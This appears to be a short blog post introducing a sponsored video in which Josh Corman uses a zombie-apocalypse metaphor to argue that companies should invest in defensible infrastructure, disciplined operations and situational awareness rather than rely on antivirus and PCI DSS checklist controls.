One of the most vexing problems that faces IT organizations these days is how to measure their relative risk of being hacked or otherwise attacked. This sounds like pretty dry stuff, but it’s not. Failing to adequately account for your risks and exposure can mean the difference between swatting away an annoying intrusion attempt, and watching as foreign competitors or nation-states siphon off your critical intellectual property, bleeding your company of its competitiveness.
But raising the alarm about this is always a tricky matter. Soft pedal it, and nobody takes you seriously. Scream from the rafters and …well…you’re screaming from the rafters. My friend and former colleague Josh Corman, however, found a good metaphor for the whole affair: the ZOMBIE APOCALYPSE. It’s all a bit of fun – though Mr. Corman is dead serious about the zombie stuff. Still, the idea is simple: attacks on your network and those of your partners are zombie-like in that they’re unrelenting and (often) mindless and opportunistic. And there are many more of them than there are of you. So, as in the ZOMBIE APOCALYPSE, you’re only as good as your defenses. Those defenses need to be strong and, also, appropriate to the task at hand.
In the latest segment from Talking Code, sponsored by Veracode, Corman says that is where most companies fall down. Corman has been a vocal critic of the Payment Card Industry Data Security Standard (PCI DSS). “We’re not literate enough to secure things. We think ‘Oh, I’ll put an IDS in front of it, or we’ll put some signature antivirus on the box.’ That was my criticism of the PCI list. Is that PCI has chosen for the 11 required controls are very brittle security countermeasures.”
Putting your faith in antivirus to protect you from adverse events is akin to boarding up your windows with balsa wood, Corman says.
“Do you run to the dilapidated wooden barn or the brick building when chased by zombies? You want to go to the defensible infrastructure,” he said.
But defensible infrastructure is just part of the fix. Organizations also need to improve their operations. “You need to now what’s in your environment and when it changes. There should be no unplanned changes,” said Corman, who notes the work that Gene Kim has done with the (still nascent) “DevOps” movement. Sturdy and repeatable processes will cut down on the chaos and anxiety – and that’s key to making sure that “your fellow survivors in the apocalypse keep their wits about them,” Corman says. After that comes situational awareness and instrumentation: understanding to the best of your ability what is happening in your environment and when. Only at the end do specific counter measures come into play – what Corman calls the “empty calories” at the top of the IT risk pyramid.
Check out the video here.